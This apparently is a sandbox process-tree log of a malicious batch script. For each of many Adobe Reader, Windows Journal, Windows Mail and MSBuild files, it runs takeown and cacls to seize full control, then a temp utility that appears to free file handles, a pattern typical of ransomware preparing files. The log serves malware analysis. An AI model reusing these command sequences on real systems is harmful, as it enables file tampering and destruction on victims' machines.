C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:1212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "create_form.gif" -nobanner3⤵PID:776
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "create_form.gif" -nobanner4⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:1040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵
- Modifies file permissions
PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "forms_received.gif" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "forms_received.gif" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "review_shared.gif" -nobanner3⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "tl.gif" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "tl.gif" -nobanner4⤵PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "warning.gif" -nobanner3⤵PID:608
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "warning.gif" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:532
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "can.hyp" -nobanner3⤵PID:616
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "can.hyp" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "usa.fca" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "usa.fca" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵
- Modifies file permissions
PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""2⤵PID:1656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1976
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Seyes.jtp" -nobanner3⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Seyes.jtp" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "WinMail.exe" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵PID:2016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PDIALOG.exe" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PDIALOG.exe" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "wab.exe" -nobanner3⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "wab.exe" -nobanner4⤵PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "WinMail.exe" -nobanner3⤵PID:776
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵PID:1624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:2016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:2032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Modifies file permissions
PID:1008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "blank.jtp" -nobanner3⤵PID:900
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "blank.jtp" -nobanner4⤵PID:1744
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:820
-
-
